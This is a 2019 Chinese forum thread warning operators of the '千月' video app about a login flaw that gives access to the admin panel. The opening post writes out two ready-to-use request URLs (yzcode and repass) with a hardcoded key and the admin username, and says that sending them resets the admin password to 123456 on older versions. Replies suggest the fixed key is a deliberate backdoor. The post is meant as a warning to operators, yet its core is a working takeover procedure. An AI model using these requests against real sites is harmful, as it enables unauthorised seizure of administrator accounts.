千月，影视双端漏洞，在运营的注意了！！

nisngyo · 发表于 2019-6-22 09:38:02

发个帖子水一波经验
千月，影视双端漏洞，在运营的注意了！！
前几天已经爆出漏洞利用代码拿后台！！！

接下来看好了！！
XXXX/login/login/yzcode?username=admin&key=465454&password=123456
复制以上代码
如果出现下面的结果，则表示可以更改

接下来
XXXX/login/login/repass?username=admin&key=465454&password=123456
显示

出现以上结果，则表示，
账户 admin
密码已被更改为123456
拿下
目前爆出来的漏洞适用于旧版本，账户名为admin的
………………
所以，在运营的如果用户名为admin！！！请马上更改！！！个别有动手能力的改了安全码的那就不用了

高板惠乃果 · 发表于 2019-6-22 09:40:53

这是什么辣鸡程序，连登录都有漏洞

fengshu · 发表于 2019-6-22 09:41:57

大佬厉害了

差点就信了 · 发表于 2019-6-22 09:45:36

握草，到处都是后门

reidme · 发表于 2019-6-22 09:46:52

垃圾程序，结构不严谨

geo · 发表于 2019-6-22 10:11:51

都忘记了，你不说我还不记得安装过这个，尼玛APP还在虚拟机呢，域名都忘记了。。。。

Apian · 发表于 2019-6-22 10:13:16

有个key，说明是故意留下的后门了。。。并不是程序不严谨

忘江湖 · 发表于 2019-6-22 10:25:42

後門

钱多多 · 发表于 2019-6-22 10:34:27

app发一下

		自动登录	找回密码
密码			立即注册

千月，影视双端漏洞，在运营的注意了！！

本帖子中包含更多资源